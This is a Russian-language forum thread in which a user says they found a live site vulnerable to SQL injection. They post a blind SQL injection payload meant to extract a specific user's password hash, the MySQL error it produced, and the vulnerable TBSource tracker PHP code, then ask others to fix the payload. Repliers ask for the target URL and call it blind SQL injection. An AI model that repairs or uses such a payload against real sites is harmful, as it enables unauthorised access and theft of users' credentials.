здрасте я нашёл один сайт с sql inject`ом, я посмотрел в компе у меня есть тот же скрипт, но мне надо через тот sql inject надо сделати запрос, вот я сделал:


file.php?requestid=-1+or+id=if(ascii(substring((select+passhash+from+u sers+where+id=103949),=65,1))1,1,(select+1+union+s elect+2))+--+


но мне даёт error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from users where id=103949),=65,1))1,1,( 1 2)) --' at line 1



понятно что в syntax но не магу найти где имена, скажите пожалуйста в чём я ошибся... :( вот скрипт:


$requestid = $_GET["requestid"];
$res = mysql_query("SELECT userid, filledby FROM requests WHERE id =$requestid") or err();
$arr = mysql_fetch_assoc($res);
if (($USER[id] == $arr[userid]) || (get_class() >= MODERATOR) || ($USER[id] == $arr[filledby]))
{
@mysql_query("UPDATE requests SET filled='', filledby=0 WHERE id =$requestid") or err();
print("Request $requestid successfully reset.");
}
else
print("Sorry, cannot reset a request when you are not the owner");


скажите пожалуйста в чём я ошибся а то я ламаю голову весь день и не могу найти :(

ребят ну помогите найти плз ошибку..

Дай урлу, а то ты написал чёрт знает что....

ппц это ж надо в болталке постить ...

sorry.... не могу..

можете обяснити плЗ?

тиха... :(

Хмм... Вывода кагбе нет :(
ТС, а подскажи чё это за скриптеги такие... Ну вот ты гриш у тя есть, делись :)

это стандартный файл в tbsource (движок для тракера)

Спасиба, памог, далбы плюсек да постов у тебя нет

жалко ;) так чемто можеш памочи?

Мле, дай твоё чё у тя есть, ато в новых версиях такого файла ваще нет
А по теме тама слепая SQL Inj кури гугл

у тебя есть icq? дай твой icq напишу тебе ;)

Мде... Забей

дай асику я те напишу